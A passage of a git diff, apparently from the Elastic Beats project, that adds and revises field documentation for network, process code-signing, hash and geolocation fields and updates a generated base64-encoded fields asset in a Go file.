on a span port should only use observer.ingress to categorize traffic. type: object @@ -4409,7 +4786,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4429,10 +4806,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -5002,6 +5382,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -5025,6 +5417,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5147,6 +5551,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -5201,6 +5614,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5224,6 +5649,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5346,6 +5783,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -6084,6 +6530,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -6141,6 +6598,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -6163,6 +6632,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -6176,9 +6656,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -6546,6 +7029,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -6603,6 +7097,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -6625,6 +7131,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -6638,9 +7155,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/heartbeat/include/fields.go b/heartbeat/include/fields.go index 98b1f1c67a5..cc872146209 100644 --- a/heartbeat/include/fields.go +++ b/heartbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "eJzs/XtzGzmSKIr/358CP23ET/YsVSL1sqx7J+KoJXW3Yv3QWPL0bI83JLAKJDGqAqoBlGj2if3uN5AJoFAPSZQt2m6PZs9xi2QVkEgk8oV8/Af59fDdm9M3P///yLEkQhrCMm6ImXFNJjxnJOOKpSZfDAg3ZE41mTLBFDUsI+MFMTNGTo7OSankv1hqBj/8BxlTzTIiBXx/w5TmUpBRsp8Mkx/+g5zljGpGbrjmhsyMKfXB5uaUm1k1TlJZbLKcasPTTZZqYiTR1XTKtCHpjIopg6/ssBPO8kwnP/ywQa7Z4oCwVP9AiOEmZwf2gR8IyZhOFS8NlwK+Ij+5d4h7++AHQjaIoAU7IOv/x/CCaUOLcv0HQgjJ2Q3LD0gqFYPPiv1eccWyA2JUhV+ZRckOSEYNfmzMt35MDdu0Y5L5jAlAE7thwhCp+JQLi77kB3iPkAuLa67hoSy8xz4aRVOL5omSRT3CwE7MU5rnC6JYqZhmwnAxhYnciPV0vRumZaVSFuY/nUQv4G9kRjUR0kObk4CeAZLGDc0rBkAHYEpZVrmdxg3rJptwpQ283wJLsZTxmxqqkpcs56KG653DOe4XmUhFaJ7jCDrBfWIfaVHaTV/fGo72Noa7G1vbF8P9g+HuwfZOsr+7/dt6tM05HbNc924w7qYcWyqGL/DPS/z+mi3mUmU9G31UaSML+8Am4qSkXOmwhiMqyJiRyh4JIwnNMlIwQwkXE6kKagex37s1kfOZrPIMjmEqhaFcEMG03ToEB8jX/u8wz3EPNKGKEW2kRRTVHtIAwIlH0FUm02umrggVGbm63tdXDh0dTP7fNVqWOU8BurUDsjaRcmNM1dqArDFxY78plcyqFH7/3xjBBdOaTtkdGDbso+lB409SkVxOHSKAHtxYbvcdOvAn+6T7eUBkaXjB/wh0Z+nkhrO5PRNcEApP2y+YClix02mjqtRUFm+5nGoy52YmK0OoqMm+AcOASDNjyrEPkuLWplKk1DARUb6RFoiCUDKrCio2FKMZHeeM6KooqFoQGZ24+BgWVW54mYe1a8I+cm2P/Iwt6gmLMRcsI1wYSaQIT7c38heW55L8KlWeRVtk6PSuExBTOp8KqdglHcsbdkBGw62d7s694trY9bj3dCB1Q6eE0XTmV9mksX/GJIR0tbX2PzEp0SkTSCmOrR+GL6ZKVuUB2eqho4sZwzfDLrlj5JgrJXRsNxnZ4MTM7emxDNRYATdxW0HFwuKc2lOY5/bcDUjGDP4hFZFjzdSN3R4kV2nJbCbtTklFDL1mmhSM6kqxwj7ghg2PtU+nJlykeZUx8iOjlg/AWjUp6ILQXEuiKmHfdvMqnYBEg4Umf3FLdUPqmWWSY1bzY6BsCz/lufa0h0hSlRD2nEhEkIUtWp9yQ85nTMXce0bLklkKtIuFkxqWCpzdIkA4apxIaYQ0ds/9Yg/IKU6XWk1ATnDRcG7tQRzU8CWWFIjTRMaMmiQ6v4dnr0EncZKzuSC347QsN+1SeMoSUtNGzH0zyTzqgO2CokH4BKmFa2LlKzEzJavpjPxescqOrxfasEKTnF8z8l90ck0H5B3LONJHqWTKtOZi6jfFPa6rdGa59Cs51YbqGcF1kHNAt0MZHkQgckRhUFfq0zGueJ4lnk+5Wdonuu9M33qq2yfp5KNhIrPi2U7VQNnE7Tvukadlp8ggu7YajXADGBlOIRWLnvHgpFFEOOofYUh7Akolb3jGBlYh0SVL+YSnBN8GxYfroJ45DEacpmBG8dTSTtBFXyR7yZA8o0W2t/N8QHI+hp/x63/u0a1ttj/Zn2wPJ7vD4WhMt3d22A7b3cn2s5fpeH8rHY+GL9IAol2PIVvDreHGcGtjuEu2tg9Gw4PRkPzncDgckvcXR/8TMDyhVW4uAUcHZEJzzRrbysoZK5ii+SXPmpvK3HY8wsb6OQjPLOebcKaQK3DtzsczPgHBAtJHP29vMbcaiipA6/OKOU2V1HYjtKHKsslxZcgVUgjPruCY2QPW3aF9umMRPWkgor38x6Hp94L/btXWh687qFGW8yC/gvfmoK+NGQHuxHsI0C0vayzP/ruKBTptFNhmzOg7O6gJxadQyqFmMeU3DNRRKtxr+LT7ecbyclLlljdaDuBWGAY2c0l+cnyacKENFalTT1tiRtuJQdZYInFaEqm1JFZSBZwhjM01EYxlaFfOZzyddacKDDuVhZ3Mmk3Ruk8nln94gQJLRUnjv5ITwwTJ2cQQVpRm0d3KiZSNXbQbtYpdvFiUd2yfF2J2AkLzOV1ooo39N+DWqvh65kkTt9VZWfiuVdKSGjUiiOKA1fpZJHE30ZjVj4BmwieNja93rE0Ajc0vaDqzpl4XxfE4Hs+Oca8A1X93IqGJ7BZMe8kwGW6odCvWTnVDNa2MFLKQlSbnIOnvUVMPBaH1K6gckGeH58/xYDql0wGWSiEYOAJOhWFKMEPOlDQylV7uPzs9e06UrEAalopN+EemSSUyhnLaSl8lczuY5W5SkUIqRgQzc6muiSyZokYqq8d6253NaD6xL1Bi1ZicEZoVXHBt7Mm88TqzHSuTBSrY1BDnjsBFFIUUA5LmjKp8UUtAsF0CtDLn6QLshRkDlcEuMFlaDxJVMQ566l2iMpdBGWtshRMJOA6heS5T0JkdRJ1tcmpk+DoQvNtFN9Czw/M3z0kFg+eLWuJotIkC6vFMnDbWHZHeaHe097KxYKmmVPA/gD0mXTHyOWoCWJ+XMZYjVufNdtK15AmozqrQsUZD7lJ3WnvwNloTzNfBw89SWhp89eooOoNpzlsm4lH9zR024qF70x42T49UOwLkhtuzgKTvt8kdQaf7euDQ9lNsSlUGNoFV+aXQg+h5tAfGHL2oXAqak0ku50Sx1JrLDY/ExdGZGxUlUw1mBzb7hX08ggwOoGYiWIL2mfP/fkNKml4z80w/T2AWdGKUjoV0pkJvoVXtGpN6E1aBrs20hcMZWR5LRlGhKQCTkHNZsGD2VBrNR8NUQda8C1SqtdphotjEcysHimgtUOPRcz878x53dsyCeQvmfYQAdywtWGLqt7meIoYfHRWOiPwEVnpVurIIcaPWdjUXFrx/VQI3AMxsNJy9g7pnsBq/QprOkFaxwv3agBPtPYPBn4jjbfp5ggcYDg+qajTLiGYFFYanwPvZR+O0OvYR9fUBKlGeI+ig2xlJbrhdLv+D1T4Tu1CmwILT3FTUbcfphCxkpcIcE5rnnvi8RLDcdCrVYmAf9UqJNjzPCRO6Uk4DdW5nq7hkTBtLHhalFmETnueBodGyVLJUnBqWLx5gL9MsU0zrVdlUQO3oHHG05SZ0+k9gM8WYTytZ6XyB1AzvBIY5t2jRsmDgbic51+COPD0bWPMY5axUhFrB8pFoaekkIeS/a8wGfbDWjvAcKDr3MHm6v0rcF1eIsqaWKQg3kRKZVegSRtF4lfDyyoJylSBYVwOSsZKJzKn5qKNLUQMBnhq3Y7UWlfzbCXCqkycZHnuyFobpe1T7aO/R79N8rQHIj/YHdNqFizN3Jh1JIOvsbtX+TgMwJOwVGB2Oh+P4SWPOKZNJys3ickUOgiOrs/fuzmtrIzDnSmyAI4XhggmzKpjeRM6KMFkHvjdSmRk5LJjiKe0BshJGLS65lpepzFaCOpyCnJ6/JXaKDoRHh7eCtarddCD1bugRFTTrYgrY4/3G9JTJy1LyIJuadz5STLmpMpTXOTXwoQPB+v8lazncIG682E72Rjv728MBWcupWTsgO7vJ7nD35Wif/O96B8jH5YktH6BmasPL4+gn1Pg9egbE+UBQC5MTMlVUVDlV3CxiwbogqRXwoHZGAvTIy83gYUIK5wo1qpRZieGU70kupXKCZwAelRmvVdtaQiF4OSlnC83tH/7iKvXHWkcgvJEmup2HazmOfocCBOSUSb/arh9mLLWRYiNLO3uj2JRLscqT9g5muOugbfzt6Da4VnTUHEy9J+1vFRuzJqJ4eQ8M4YHGLKdnQUfzDBFlxbPTs5sdq2+dnt3sPW/KjIKmK1jw68OjfliakwtqkvZie89q/4LXL6zNiKbP6ZmdyBkCGET05vAiWNXkGUumiXMR0Ty2/gmakN571LivCAcgMiStpQo+RTEluaQZGdOcihTO44QrNrd2DBjuSlb2mLbUVrvoUirzMK3Vay7aKN6vysbYsOP/WfCBBusDlLjGqs/w7U9S2baacHT2ZBlN8vb9OHN7cBvxW5ajDVMsu+xTFh9PZlmLZcanM6ZNNKnHEc49gIWUJcs8yLoaex0z7P9P9cUNyp5oOGdgTqSCkJ/EPZekslgjXJO1+Iv2jRIGP7mboowZpgqQsKViKdfWhAL3CEWjFq7NIeirGuc8JbqaTPjHMCI882xmTHmwuYmP4BPWdHqekAu1sLRqJPoDPnIr0VBqjhdE86LMF8TQ63pf0QjOqTZwXYGRT2hvC2kI2HJzluew+otXx/VV/Voqk+p6rSsiI2w0qCKgfZXUECYBog/qy6SyR/v3iubWVg1bildcGGISqRN57kkFdAfCPqasNHUkCLxWXyN0yD2BqyNKSqoMjzxkpAMBMA+Oc9n/735H7aPWsUAZquye2JlTKmoXGWnS1SDCQAgN6yxozHI57yfz/jPRPDcxbtfm83nCqDZJsXAjIGHgyaDarEUXagiEG2VGdR3ZBWsFkRqmGdS0pqvxVqKr8ahx+AYNIq7Bw1AL56PxIRb1GGsDPHNCWgbPc7hvYYrLnltqu4BAbPcEKRhZXsIyvgDXY5OJFVI3zM7qCMWt/hm7eHX8fIDXkNdCzoV37zbAIo65DLwfHZiAJVlPK9EhSboMsj1vGDa6A7e7BHTw5+aMwBVvY4r1TizHHuH7Bt1UmqlktSQT+xLwykUqvMiwk+PtasHAwScnt4lFKsir48MziM3CFR+HoWJaWe+ujhWU5ytanDVcCUzgFfOkC4Dlnj020J/SpWgXvK5rgQCmMb2hPKfjvGuGHeZjpgw54UIb5kisgRu4IfhqBAizr54CcZErix7rRlD5YEBcnw/yAF/6ZplTY9XsHkJFOFfo6Il3AifrAjGjerYyPxNiCviOnQfDIJVi1r7rhFNSx6AEoUKKRRzPjpZKRCrvNXNhWFewCp7hVQx8sKu7CspAKsUE94rmjTmpyHr0KwgL6iGqlUTj3RKMhyjr2azH8+x8NY52PrMWJboDIdiZi+6iI5ZGgaV1UaFk3r4zeTTCPVSKQoYCECTM5H2hkMTTzF1oAbz+z7VrPqaCXkK40NqArCkGWrSYXtoBMcb/DpzVwR2yQsBDbIf/4vbQDkzxInjGwhUgDAUGiJgoGtI+6mXgHS2GDXrnAAQPklsD2CfkdR1YzHUc4UgFOTnaQgvKHrMJM+mMafD7RqMTbrTLGaiBtEe0merSyFngOkTONUFw46pKuGQExQppQpwdkZXRPGPRTG3IECZKXLS8X5AnHVG/6nzWzawcHLQeCNIC3OTegWOH5boG1SHsIbf4KdyorE68rV/UCMK5IB0ivtvkWUhxcaxrQTI+mTAVu9/AM88hscMKfMtwNgwTVBjCxA1XUhTNuM6atg5/PQ+T82zg702B/snbdz+T0wyTUCCOp2pz0a4mvre39+LFi/39/ZcvX/aic5XXLV2EevZHc071HbgMOAw4+jxcogrZwWbGdZnTRaxQxXYxpqNuZOxmWfPYaag852Zx+UcdAvHojDqah9h5LH4w7gI4BTCgmjV1eHWlN6zVvzFqXV24wN3VHbJTH7B9euylCcDqWVsbUL4x2tre2d17sf9ySMdpxibDfohXSMcB5ji0vgt1dCcDX3YjxB8Noteeu0bB4nei0WwlBct41fRWusTtL8JS3Vwxs+o7tI0jehbeGZDDP6zYrr/pyfZZbLhJlj2tfv1fhgd6DOA94rJrR87VXH0/uyoW5OHrv+HZUhFYnx3c4VEAEyZ+1XEeM53rAaF2oQMyTcva8SkVyfiUG5rLlFHR1ZTnurEsvA1e0aLcZfAnsttYyZUZu9R8KqhVSBvarswYOW/8crvaezFjmrUTXhvWHuiPYy6oWsCkJEyql4+1x6yoe0ywsZQ5o6IPbT/iT2AI0xJUcI4JBg4Wiz4Xztq1LIyq2D22Q3QHY6ipVhbteZhl3MVyd7EMlM6UwesN5kDpScCq0Ix3aa9TqwynalEaOVW0nPGUMKWkwrz0zqg3NOdZHIoiFTGq0sbPR14xesNIJaJwZTyG/tX6FX8+6/HDsHOrool0xtLrvuzKk3fv3r67fP/m4t3784uT48t3b99eLL1HFVZYWFHExjkO3xDYgfQDv6vj33iqpJYTQ46kKmUj/+z+GxGLRraMBL3jeKyfG6kYWn3xVvZsD0lnzSusv9s9pRDiXr9+23uQVIuFBHxM7wDsQcvHwpCNyyUp8kUzp3y8IEbKXLvkXfBSQjooS6/R4kM67JDMww4yEOtn4rWf76CHFkRKkwPdMIVXl3RqTdvIGzRjNQ8Vpmlz9B432kD+PWdpGcTUggOYvCPjIDPiL+9IgAkPNpMcXPpBpz5JVDHBZV87IAMUSATufs1FrMhJPEhU7CaSVTOWl5FTFNwHGOkShtbOMSEWVrIaHrSeZSTWKv2W9eJ51lT+eUGnKzVGYqUKJguxswiQJTTMSpeiDzRDpyuCrKYsBxedtm6pohI8d08fleK5oxhP20yDWV1dm8a8K9yOetF1eGDQQ5FmV6WI4uikoIJOkflzXRNCR4nCEkARH4lybWJOctz6+g5eEj1aF8ZBJttIyXJRGFDyqZldF4DE1KRNjCZLmpzCcqgoSwp9lY3ErYELQxuQOlkNPGQuLQeRYpEUVUKhvclrnlf1rC1KB7svEQzZ4CRUHXPc77ZUp2iCVAptTSSWocyhGgpjxWndmOfjRh37JCmQOaK5Yn3bhB4NTWR6moxz+RoFwiDcIoztTXkXydOMWgV440IycJsA/mPR/5zHQlillg2145vM+GokrC2V9hW0BlcN7ZHSvsKwkP71lPb1lPb17532FR9MH0jsSh+29+tL5X7FIuUpAewpAexxQHpKAFseZ08JYE8JYH+iBLBYhn0TWWARQCtLBeOlnS1e+j35T6yR+FQqfkMNI8evf3vel/oERwGMtG8q+wvSjSIPmlsp+NVq3BhJxgvAxDGDupaPv8JV5HM9QBf7ckldt9Ly187syjpq4lN611N611N611N611N611N611N611N616MB8ZTe9SgE+JTe9ZTe9ZTe9ZTe9ZTedSfOwgVLjnLUBxy8egUf7+7sskyQK4T45XysqOJMk2whaIFOEY9QSTPfPMf16QCvqfv5NRULVxE77vPhytNKsqZnFGqvNOZZcz1WQu4KGChesR9XoaEaaPTM4HjQziyyaiYyz+Wci+mBh+Yv5BgXsJFzce3mW5BnV0mW51fPXZFt7/CRgvzKRSbnun7/HMF9i8GQz64SLfveey/4xw1QTjtr78DSAGOR83HfgAVN354vf1vfjIRO/kShxi3InyKPv/3I4/aWfT+ByK2VPcUlryouuYXopzDlW/BkVeOkyHZXxBBfH+/iFA+CR8/oaEUAnf9yOPo0iLZ291YH09bu3qdBtetuY1YC1e5o62FQrYhDN8x6p9y0xWZdtr+gpfZXWDFPh265UpCM6+vusblmSrB8eyvxmu8yuXnUrMp+/anKc4TYTtJZewv4o4MPTrH8gP1ttrc+fNKCWEJVOuOGpSGtbQXx2GfvSTwNMVRNmQmuDLvszhI/7u08YBVWRFGxWNECTkNNT5ymQ2YDn0WZEehRWZQ8ZxuQHPGo6kTJkgiwVa+2FYvzCYs9o3HA0v2Ls8Nf9naXevzV3TRbTT1wZXvJdvJybzhMRi92RrsPWCIvylW6wQ7R+RWSUUqpjCt6cXaCJ40cCuKgIBsbcFMIj5EILmJ/SZu9kidcTJkqFRcudZW7hquETgy0PkGMuchzXxDDambYO6XWiBQVOlhLmsysDiTTtFLKqpgYtIxtzlz7T+iPZRQN1hZAj4nKTW1KCXyY1t3M5/N5MuGKsQUwis1xLqebZqYYNRvW5LS8aXNrONrZHI42jaLpNRfTjYLmc6rYBiJnw07IxTSZmSLvSpNhurc/3E532MutrZH9I0vp7su9bUqz7b0smzyAQHwP0Us4DCstoeBOwudws/Ozw9M3F8nJP04esETXanjV63LTfM761gK7/vDx8MR7c+Dvt8EvgyJ47W4EBEebaHSqO35zDh/vcLT91OisZCc8fnNOfq8YHEBrj1Gh5yxqcm5/d4WUnF3GOJzF0J2obiPnx1qQUnEJLrUpwz6ublg36LOrTGgooHEAz189d+2GF36SeHS4RfIpROj+rhs/uxFx2pCVpPHykzYCCxwMaD3OmWL13qH6wDWO04USX716/pAclcaKl86Ga7FgQSg4daMUJyrcG3i3S9OZm4to1y1MMVMpEd1CuP6QvtJ2pP0yAldS12zh8FKnh/gNQDxr5tvUN7JfxgtycnReh0+8w9ZnOBbwYuCgsUOrqJeDP/rJBZnbt06Ozt3w7YBXu5eWxqJmwtjtE35ppqTZ5zwtk0NDCi54URUD92UY1y+qqLRpNBS/srNcWeAgSaqzDK7rC82BNRzCkBAzkoLg5FDlHPp5a1JKrfkYLwkz6ORl9T9au/2cA9ynufQDSjVJsROsSz9b7yO7JM3pyhKksOYJxbjRsCE+NTFDioHOzS7aERvidTji6Zte0KNiaisJTAFoIxaIQUY+YrF5OBjFSmY+bBtfLZnItL8whSI9wJU8SuIB/do7Yn40TPz/68XCqovWxPFlRsbVTlqgkxLbw+lmw13qHHtyQo7eHL4+sQdizCyy7Pv5jdW+Iua0vq7JFd5w1izGROlyUviGxVIppktpURy81NEgcC4Tchp4lZDGh8e0x3T6D7mCtoY+N+vKihcW5RxG2wKxYreEB/qtMWaZQJHbYmgv/HUchDffgLvfsm5YMGCgdxe8A5Wms5izswkwpkZeH9cpVRnLEvIbU9LX4CnAATlzF4LIQ2sEjmus4RQ9eVT9hLrCOlgXs7oG1ifyGKDNpvuL0Yypy0lOp6u7y/E3sVskZ8ZaNJZN4swEZm5UiCqxB3BdLOmAHB4OyMXRgLw7HpB3hwNyeDwgR8cDcvy2x237z7V3x2sDsvbu0F/S3lYl4VG3xq4J48njUACq4fIj81pHqeRU0QJJD11tJqJgjCllyjVNjAaCdPeS14mfyBZ0jwW9NRqNGuuWZU8Cy6Mv3t2nSoGXPqhAYR0Nd6lyzQUEdaN+2lBZCSmY1nTKkjjYkGu4Q3a4q9upYpAwDoMqMGAGrrrjMW/F0d/en7z77waOAk/8YrqCa4zr5ASaHfeqBQ3WvUqJCKKwBVos8YJTuFUfVUixAa4M6HCfzqiiqbGGxjMMYt7eggxvCwEZbe09j2OCpW68UTPxYABhA2OmU1raM0U1I6MhyI4pzPHh+Pj4ea2A/0jTa6JzqmfOoPu9kpA9G0Z2QyXkgo71gKRUKU6nzFkNGrXTnEd53hPGsniEVIobplzCygczIB8UvvVBAP0xdzP3MOka9vmrJ2g8JWV8S0kZgS6+cHYGbzgP3ArvSqnoMIs/URLBfD7vR/pTxgCywKeMgYdlDNQE9GXMA2cl3a1ZHB4eNvP4val6+TnJrYcdD12ek9Mzq8gxqCR6FXs2rlouBv/jlff0OdrhkwlPqxwcSJVmAzJmKa108D7fUMWZWXjTKKbUghptTUI7lAMrIScfjfKd8gG+qJ6NB9TMmAJvAHg+I+Rc1TorvWYwuPdmYTfCjH20bxeWSuKhUS/Al+B3RjWHaMswYt2THtUVq+FOZE+t8/V/rkVOE2vv1B9HbcPH68Ffwgzwc/VntL95C/FsDehWeCjW41MRvPc+7CgbOAxbjRQIrym2oOd/XeUv8v5DONaU3zAN3f6je4NG+394LFUsDvfLhA6jTBC29gXAslDUAHhvvvP1N4BozS+FL+dUMuXW/0yW6HXNF3YILWWQKM5Ww2PxPCGHIoPmCakUtdnaqTxmD9XttxDej2+tOMcMOvQdHL6hKG/auN85Obrvfuc1M3QjdlL7oo7OC718PeDei/MoIEex3yuuWAb1UR8hSufk6DzcooMAC/i1i9HEyIRcsVQn7qErTMfxYNTcD1Qi4DmVNljWGK6s89yRUERpv86YwD2DDUyV1JGmxkXGU6bJxoZzjrqLCwuQxafO+XRm8r4OEdFq4P0oQDxncIdu2FS5G2ua/cuC6hPn0xkraAv/pBG630M6o2SYDGPKUUo26oeehC+WDsOnIrqFc1HDQL4L8GoEPL7XDFk7KA74nLv+KUsGdcNyhv1ILJo9I4CMmZRa8TNHsRO8GLj33GiWT6IUYYGjP+AObkU1TACZ6PJpXSMggHd64FaUgOMDoHogcG6me8CIUmV6FutdVY2BtaHp9aVVK76HnMULDCBOoV5kysKdD2DUEmuZw90g+xjSCkDv6c2z/jJKb9jwQWyguPKLVOtGuAKWCAjlMCLu8S96Q5OcimnypsrzMwkXEyf+8Zit3Hgu59lK+OJutuKOdF9JYohj/mhuyXnIpTddsHqx4mmDPQQudGgfJVBZydVl1J1yma0CoVCVcYZHN7Cr2mp4JQOzAlniijDU6VTUhFszsLrEtB4jtH2wE9WLcOP5oajPUrKEB5lW2OEJW0fVBUydkx2Nm1B7xY3pr8LBDoyriwywsKQfpG4KTsbMzK3KT+MqnbRZzxMn44IbDrHkdqtyqe3aDv1O3I9uq3qFmq1why4qLPOWk4JRXSlWYJcukd2C2egxiF839JoFGo7RHJNHjeOCFRIiUpi2w/jhshrTrnrqDQ9szLACPPuVYgk5Z7jnV5g3Z2XfFS6bG9cqAviEj76AnNBwqR+OcByc4CCF2qjG2uwNub5ct6wl6rx9svmAowebwd9GuMTBpscjVDLDKME4QkJEb5FTKCIOJFBrpTMqPF5TathUgingxw+baxnGFSBkg2bZ1YBcuXOzAeeGwVcTnrMN1PyzK7xM8lcqDQEBKn8Uv+KCG3OgsL4eW5VmaqOkWltkbmAYUlPNcKCvZjswrwsO0oRMrGVk1csjnNOX58TALrS2QXGlBnekdoyB/eK8W25r7EAeeDLjTFGVzuLw+Pbe1BohbvfamE/JuIKiUGsWvmhEznTTwxYp6blhynG71hQHbmevyMIJi6C5Y+8/5/Fyj4UxIRuIm4W7TENlm2vkWfki7hvoZrSbcuUjRLnrVkbjgny6Gnuw2lQfxveWnZsX/Gk0z+XcQmjNzbS5UU7uuCVFbjlqrB4BWxNMkAiTXWuxMjOr/UUVH29Xex/Pu3DaLAoNSnCInnPFuvkETW5I9IwwF9VV9tFblWZBaGRMN7rFOZ1Tk0pERZYHRLEpVVke7z5wf3iaWD2msn9IRezywLQDEwsFjbxhCqQMBC97lckrezzeEuaDNFHPIafH3W3Y2dvZbyIfOdA9vCCr/RNN/LrTgIN02kWyTZCPc19k29WYppYgVZQnphgF3mapcwp7IpX9DI6VkpdQc/xWms641SFSV+Ht/0DlakOLEtkGNfFXdRFKB2sDfwAtQ8+jr+0e3WvnHZFyKkhhRbLmpkL7eOCiD81ckjCtO2hj1mOFI+v3H9M4rqURg57SPIU8OVcuLocAG1SMYgeUC1lwoZdI4jWTiNUW2BZ4FZCOexIS0TPCjeMSLUgKKbiRdahfPcT6OljKfsfsR98V0EhyzVhJqhKvFOCl+HA1sWotbYS0iUcrWvHEpTQfxDtb3/dGtSVid+zWcLS3Mdzd2Nq+GO4fDHcPtneS/d0XvzUdsRk1VLP7yvx9fsUWnKYVoyYaGMFrFrgZxyQAq37IqM+eNSGk8uIGi1DStCFncjkdOJMwl9Png3jyIEWMdDrOoq6aHp3XVBZRLTdsR1uDDZsOCRAF8GwoMSCkCc4uGN7qPY25wdQL8XKFzKq8Jn2swYM1CFDroSSTJirXHw/TI2xKms5YEuEibG+llik53FPGsfUmF2VlLv2PggrpYuK8/VeZ+AGqX/M8573P4GUb0Miol3CO3dQNtxqBa8EwbZOSkE8h1u2Zx8/Mmk2KuQtJU18ANkIc+3iRZzQwu8i8KWD3lHeqAzGxTBTXbSKlBrUjTdqCBOnNCk7/vVerAuBW1sD9oRyDudjqj7PCfKRfqJ6RZyVTM1pqe/i0sd9EqUTP4SKQzp0kM9BfguIdVeQOKqTQRtnlg8sAfLFWc2wTfd2ZtO+vwx+Pjr+Yo+/02K7Gm1p3VHHZpzuT3eEwa0ImpqxbK2B5neQiyASgi8BVqVL8xsdiMih7rWjuQkuNVB0NA3QLX0YFlIGrWuDEuniLLr26kC9CalfiOGUtiXMtO6M3tKl4goJRYeJ0fEzosfI66ulDggJFNJ332sCnwhmV9nSh0W/NMK2rwmoMQhK7NrB2BkFTcLLX31bNlBQyl9NGLRsrauS1DxHg+qCBK/L/thdXf+O3+2opmb2bjIaj35ZO+r/mbWb0jdm5PqDrkwxddO7gJaMdaMOP0vZNQqaKVxvin02nA4znuhiNA8060Y8X3c0Z1x4h3JHWfpNeC9pFCnurBfkdqu3TiusZoTlTxisycBYa3rFWDAIKreZoLR0V10hmWJRVY2QrQNDIDosEHJlRkeUQaDhjC7g9m1tTWZjomCpm1wzOyvpLVDMAIUrm9aq5gVHgpEN7OYjG0sYSw3zGIC0txLZjy3+4+zNwUzitcqpC0H1tOiqrXPWoPHm7fldDp1qZIouzROkmEAYNa2lriu6i3JkPYKAgr6pKzNV1ZAWlga2JDEOjRZFXU9AEup6U+qaewkkQXntGffgQVEGQv88H/tzgyFetWLSGKVhfRYAb0D5/m57ZwLrn/avA+zvL1NlHE5wHlpyF4SqcvveO/O/QGm4xoq3GDvdDDLW7TKaXUTfkjGurmWTgGMVyfmDOQgYxy2qit9q/i+WBsGCjOLvxtvTVJe7NFeSoVZpBZSesWChvmFI8c6REo9gFH67jwR2ErmSk0v4qc87zLKUqQyK0SO5u1zkryeglGe4fbO0djIboTT86+elg+P//j9HWzv9zztLKIgk/EcyThoZ2TOF3o8Q9Ohq6P2pN0/IbXQEvwOLY2siyZJl/Af+rVfrX0TCx/zcimTZ/3UpGyVaypUvz19HW9tYP0Zr7BJqsjLXHvmmZZq22TxVpbn1XPh4wYwICwmOGiYIq8u1Sj3i4QqpNVcpzqywFP07JlA/3DmIL2pagnwizpl2ru7bm9EYalzKBWqXPIo7a05HofiFreEaRSWGGWUveWhHhSyBFQqUWmS3EDKy8cY5CFMW8dsVEC4xAP7QSSAT4vf5LMToPZE8pK28mkmdhbfjZpbmhWhAGrUOEURN0awQXQ11fsE7PDVWegtGPYtyOHolhHWK/UB5YtkDzPN7gpbb1Jg5wcRsbB4/9VCmgpxotwqXsO